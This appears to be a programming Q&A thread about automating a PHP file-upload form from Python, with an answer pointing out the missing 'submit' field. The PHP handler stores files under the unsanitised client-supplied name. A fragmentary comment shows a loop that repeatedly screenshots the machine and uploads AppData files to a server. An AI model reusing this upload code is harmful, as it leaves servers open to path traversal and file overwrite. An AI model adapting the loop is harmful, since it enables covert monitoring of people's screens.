# Automate the file submission on php form using python

Tags: php, python, forms

I have server running on PHP with file uploading script which I have typed in index.php.  I want to upload the image file from designated path to server automatically.

PHP code:

```
<?php
if(isset($_POST['submit'])){
if(isset($_FILES['file'])){
    $err=array();
    $f_name=$_FILES['file']['name'];
    //echo $f_name;
    $size=$_FILES['file']['size'];
    $type=$_FILES['file']['type'];
    $file_tmp =$_FILES['file']['tmp_name'];
    echo $file_tmp;
    $file_ext=strtolower(end(explode('.',$_FILES['file']['name'])));
    $allowed_ext= array('jpg','jpeg','png');
    if(in_array($file_ext,$allowed_ext)==FALSE){
        $err[]="extension not allowed";

    }
    if($size > 1000000){
        $err[]='size is greater than 1MB';
    }
    if(empty($err)==TRUE){
        //chmod('upload_image',755);
        echo $_FILES['file']['tmp_name'];
        $newname = dirname(__FILE__).'/upload_image/'.$f_name;
        move_uploaded_file($_FILES['file']['tmp_name'],$newname);
        echo 'success';
    }
    else{
        print_r($err);
    }
}





}

?>

<hr>
<form action="upload.php" method="post" enctype="multipart/form-data">
    Upload your file here:<br>
    <input type="file" name="file" />
    <input type="submit" name="submit" value="submit"/>
</form>
```

Now I am trying to automate the form submission using a python script, something like:

```
def upload_file(path):
        url='http://localhost/phptestprogram/upload.php'
        files = {file: open(path,'rb')}
        r = requests.post(url, files=files)
        print r.text
```

but I am not able achieve my result.

Answer (score 1):

Your php script is checking for `isset($_POST['submit'])` before it processes the file, but your python does not appear to be setting the post variable submit. You probably need to do something similar to:

```
r = requests.post(url, data = {"submit": "submit"}, files = files)
```

Comment: *What's* not working? Help us to help you. We need to know what you've tried, error messages, and how it's differing from expectations.

Comment: def upload_file(path):
        url='http://localhost:8081/phptestprogram/upload.php'
        files = {file: open(path,'rb')}
        r = requests.post(url, data = {"submit": "submit"}, files = files)
       def scr_shot():
    //some screenshot taking codes
    os.system(cmd)
    time.sleep(20)
    file_name()
def file_name():
    global path
    global pathnew
    path=os.getenv('appdata')+ "\\"+ 'userpic'+"\\"
    for root,folders,files in os.walk(path):
        for f in files:
            pathnew=os.path.join(root,f)
           upload_file(pathnew)
while True:
    scr_shot()